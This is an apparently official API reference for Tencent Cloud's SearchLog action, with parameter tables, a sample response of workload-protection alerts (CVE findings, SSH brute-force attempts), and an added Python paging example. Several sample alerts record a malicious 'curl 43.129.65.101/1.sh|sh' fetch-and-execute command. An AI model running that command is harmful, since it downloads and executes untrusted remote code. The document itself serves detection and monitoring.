Domain name for API request: cwp.intl.tencentcloudapi.com.
This API is used to query logs.
A maximum of 20 requests can be initiated per second for this API.
The following request parameter list only provides API request parameters and some common parameters. For the complete common parameter list, see Common Request Parameters.
Parameter Name | Required | Type | Description |
---|---|---|---|
Action | Yes | String | Common Params. The value used for this API: SearchLog. |
Version | Yes | String | Common Params. The value used for this API: 2018-02-28. |
Region | No | String | Common Params. This parameter is not required. |
StartTime | Yes | Integer | Start time for logs to be searched and analyzed, which is a Unix timestamp in milliseconds |
EndTime | Yes | Integer | End time for logs to be searched and analyzed, which is a Unix timestamp in milliseconds |
QueryString | Yes | String | Statement for search and analysis, with a maximum length of 12 KB |
Count | No | Integer | Number of raw logs returned for a single query. Maximum value: 1000. The Context parameter can be used to obtain subsequent logs. |
Sort | No | String | Order for returning the raw logs. Valid values: asc (ascending), desc (descending). Default value: desc. |
Context | No | String | Pass the Context value returned by the last API call to retrieve subsequent logs. Up to 10,000 raw logs can be obtained in total, and the Context value is valid for 1 hour. |
Parameter Name | Type | Description |
---|---|---|
Count | Integer | Number of raw logs matching the retrieval criteria |
Context | String | Pass this Context value in a later call to retrieve more logs. It expires after 1 hour. |
ListOver | Boolean | Whether all logs meeting the retrieval criteria have been returned. If not, use the Context parameter to retrieve more logs. |
Analysis | Boolean | Whether the returned data is the SQL analysis result |
Data | Array of LogInfo | Raw logs matching the retrieval criteria |
RequestId | String | The unique request ID, generated by the server, will be returned for every request (if the request fails to reach the server for other reasons, the request will not obtain a RequestId). RequestId is required for locating a problem. |
POST / HTTP/1.1
Host: cwp.intl.tencentcloudapi.com
Content-Type: application/json
X-TC-Action: SearchLog
<Common request parameters>
{
"Sort": "desc",
"Count": 20,
"QueryString": "",
"StartTime": 1656641065449,
"EndTime": 1656641965449
}
{
"Response": {
"Analysis": false,
"Context": "",
"Count": 17,
"Data": [
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-20/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5704\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x XSS vulnerability on form structure page.\",\"id\":\"771\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://httpd.apache.org/security/vulnerabilities_24.html\",\"path\":\"\",\"fix\":\"Upgrade to version 2.4.6-90 and above or 2.4.39 and above\",\"cve_id\":\"CVE-2019-0217\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server mod_auth_digest race condition vulnerability\",\"id\":\"767\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_auth_digest module enabled, and the Apache HTTP Server version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1. \",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"True\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-19/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5703\",\"cls_event_type\":\"emergency_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin central_columns.lib.php SQL injection vulnerability\",\"id\":\"772\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/central_columns.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.seebug.org/vuldb/ssvid-92512\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. Upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-6633\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin dbase extension remote code execution vulnerability\",\"id\":\"764\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/zip_extension.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490\",\"path\":\"\",\"fix\":\"Upgrade Apache HTTP Server to version 2.4.46\",\"cve_id\":\"CVE-2020-9490\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server http2_module denial-of-service vulnerability\",\"id\":\"769\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_http2 module enabled, and the Apache HTTP Server version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1. \",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"True\",\"reference\":\"https://www.seebug.org/vuldb/ssvid-92209\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version and avoid using weak passwords.\",\"cve_id\":\"CVE-2016-5734\",\"cls_event_type\":\"emergency_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin authorized user remote command execution vulnerability\",\"id\":\"768\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/controllers/table/TableSearchController.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-40/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-6617\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x SQL injection vulnerability of export feature\",\"id\":\"765\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/display_export.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-25/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5732\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x XSS vulnerability\",\"id\":\"770\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/templates/table/structure/display_partitions.phtml\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11984\",\"path\":\"\",\"fix\":\"Upgrade to version 2.4.44 and later.\",\"cve_id\":\"CVE-2020-11984\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server mod_proxy_uwsgi buffer overflow vulnerability\",\"id\":\"766\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_proxy_uwsgi module enabled, and the version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1.\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-06-30 11:01:55 +0800 CST\",\"hostip\":\"172.16.48.133\",\"modify_time\":\"2022-07-01 10:15:23 +0800 CST\",\"count\":\"3380\",\"uuid\":\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\",\"src_ip\":\"82.157.124.14\",\"src_machine_name\":\"ssh\",\"event_type\":\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Beijing-Beijing city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001705\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641844000
},
{
"Content": "{\"create_time\":\"2022-06-30 11:01:55 +0800 CST\",\"hostip\":\"172.16.48.133\",\"modify_time\":\"2022-07-01 10:15:23 +0800 CST\",\"count\":\"3380\",\"uuid\":\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\",\"src_ip\":\"82.157.124.14\",\"src_machine_name\":\"ssh\",\"event_type\":\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Beijing-Beijing city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001705\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641824000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:10:03 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:10:01 +0800 CST\",\"id\":\"3141559\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641520000
},
{
"Content": "{\"create_time\":\"2022-07-01 07:44:58 +0800 CST\",\"hostip\":\"172.16.48.79\",\"modify_time\":\"2022-07-01 10:09:23 +0800 CST\",\"count\":\"349\",\"uuid\":\"93137e79-ae2e-4677-95ac-23a5024607b1\",\"src_ip\":\"110.40.168.164\",\"src_machine_name\":\"ssh\",\"event_type\":\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Shanghai-Shanghai city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001999\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641484000
},
{
"Content": "{\"create_time\":\"2022-07-01 07:44:58 +0800 CST\",\"hostip\":\"172.16.48.79\",\"modify_time\":\"2022-07-01 10:09:23 +0800 CST\",\"count\":\"349\",\"uuid\":\"93137e79-ae2e-4677-95ac-23a5024607b1\",\"src_ip\":\"110.40.168.164\",\"src_machine_name\":\"ssh\",\"event_type\":\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Shanghai-Shanghai city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001999\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641464000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:07:04 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:07:01 +0800 CST\",\"id\":\"3141558\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641280000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:05:04 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:05:01 +0800 CST\",\"id\":\"3141557\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641160000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:04:05 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:04:01 +0800 CST\",\"id\":\"3141556\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641160000
}
],
"ListOver": true,
"RequestId": "e6bb2f6d-10b3-40fd-b3a4-630dbdf477c3"
}
}
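An added example, not from the original page or from Tencent Cloud's SDKs: paging through SearchLog with Context and ListOver within the Count and total-log limits from the parameter tables, then decoding each Content string and setting undecodable entries aside. `send`, `fake_send`, `SAMPLE_PAGES` and the 192.0.2.x values are assumptions made for illustration; request signing and HTTP transport are left to `send`.

```python
import json
from collections import Counter

MAX_COUNT = 1000    # per-call ceiling on Count (parameter table)
MAX_TOTAL = 10_000  # most raw logs reachable by following Context

def search_all(send, start_ms, end_ms, query="", count=MAX_COUNT):
    """`send` (hypothetical): SearchLog JSON body in, parsed "Response" dict out."""
    body = {"StartTime": int(start_ms), "EndTime": int(end_ms),
            "QueryString": query, "Count": min(int(count), MAX_COUNT), "Sort": "desc"}
    logs = []
    while len(logs) < MAX_TOTAL:
        resp = send(body)
        page = resp.get("Data") or []
        logs.extend(page)
        # Stop on the documented flag, or when the reply cannot be continued.
        if resp.get("ListOver") or not resp.get("Context") or not page:
            break
        body = dict(body, Context=resp["Context"])
    return logs[:MAX_TOTAL]

def decode_events(logs):
    """Content is a JSON document carried as a string; keep bad entries aside."""
    events, rejected = [], []
    for log in logs:
        try:
            event = json.loads(log["Content"])
            event["_ts_ms"] = log.get("TimeStamp")
            events.append(event)
        except (KeyError, TypeError, ValueError):
            rejected.append(log)
    return events, rejected

def count_by_type(events):
    return Counter(e.get("cls_event_type", "unknown") for e in events)

def _log(content, ts):  # constructed LogInfo entry
    return {"Content": content, "FileName": "", "Source": "192.0.2.10", "TimeStamp": ts}

# Constructed two-page reply (not real API output), keyed by the Context sent.
SAMPLE_PAGES = {
    None: {"Count": 4, "Context": "ctx-1", "ListOver": False, "Data": [
        _log('{"cls_event_type":"bruteattack","hostip":"192.0.2.20"}', 1656641844000),
        _log('{"cls_event_type":"bash","hostip":"192.0.2.21"}', 1656641520000)]},
    "ctx-1": {"Count": 4, "Context": "", "ListOver": True, "Data": [
        _log('{"cls_event_type":"bruteattack","hostip":"192.0.2.22"}', 1656641484000),
        _log('{"event_type":""Brute force","hostip":"192.0.2.22"}', 1656641464000)]},
}
def fake_send(body):
    return SAMPLE_PAGES[body.get("Context")]
```

Entries returned in `rejected` keep the raw Content string, so a malformed record can be inspected rather than lost from the triage count.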
TencentCloud API 3.0 integrates SDKs that support various programming languages to make it easier for you to call APIs.
There is no error code related to the API business logic. For other error codes, please see Common Error Codes.